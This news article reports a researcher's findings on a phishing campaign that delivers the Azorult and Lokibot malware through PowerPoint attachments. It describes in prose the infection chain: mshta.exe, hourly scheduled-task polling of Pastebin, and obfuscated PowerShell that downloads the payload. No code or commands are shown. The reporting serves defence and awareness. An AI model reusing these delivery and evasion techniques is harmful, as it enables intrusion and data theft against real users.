It is no surprise that hackers use songs as bait to spread malware, but their song choice is debatable.
According to a report from cybersecurity firm AppRiver, a hacker going by the online handle of Master X is exploiting lyrics of Drake’s very popular song “In My feelings- Kiki Do You Love Me” to drop PowerPoint malware.
In their campaign, the hacker hides the lyrics in a PowerShell script and uses PowerPoint to spread two of the most malicious malware Azorult and Lokibot. The hacker then manually selects which malware is to be dropped on which user.
For your information, Azorult is a RAT (remote access Trojan) that can infect any computer successfully while Lokibot is a data-stealing malware. Azorult was previously found targeting thousands of Magneto sites and spreading PayPal themed banking malware.
According to AppRiver’s blog post, the PowerShell script has a reference to Drake’s song’s lyrics, and this is an email-based campaign where a user is asked to download a PowerPoint attachment, which is part of the email. This attachment is infected with either Lokibot or Azroult.
AppRiver researchers also shared a sample of these infected emails. The email’s subject line indicates that it is a conventional Business Email Compromise (BEC) campaign. The subject line also contains a call to action, which reads “TT Remittance Advice.” The email generally has two PowerPoint attachments namely “INVOO13433361.pss” and “Blank slip.pss.”
AppRiver’s security analyst David Pickett explained that when the recipient opens any of the two attachments, a “heavily obfuscated visual basic script” is automatically executed. This script uses a Windows-based Microsoft HTML application host dubbed “mashta.exe” to access a Bitly shortened link to disable all the security features of a browser. Mshta.exe is primarily used for executing HTML applications and also helps in running script on Windows OS.
Once the file is executed, the attacker is able to create a command line to kill Word or Excel if running, and access Pastebin to reach out to an encoded script. Basically, the attacker creates a “scheduled task” for mshta.exe to access Pastebin every 60 mins and the encoded script is retrieved to determine which malware is to be dropped on the device.
The Pastebin code is translated into a PowerShell command containing a reference to the abovementioned song’s lyrics. Interestingly, the hacker has spelled Kiki as Keke in the PowerShell script.
“‘Master X’ also obfuscated the ‘DownloadString’ inside this PowerShell script below in another attempt to avoid defense solutions monitoring PowerShell activity,” AppRiver revealed.
Finally, the PowerShell script accesses Paste.ee to download the code for the executable Calc.exe. This file infects the targeted computer.
The prime targets of this campaign seem to be enterprises since the email is disguised as a corporate email. Whether this campaign has been successful or not, it is yet unclear but we do know that it hasn’t managed to infect a large number of computers as of now.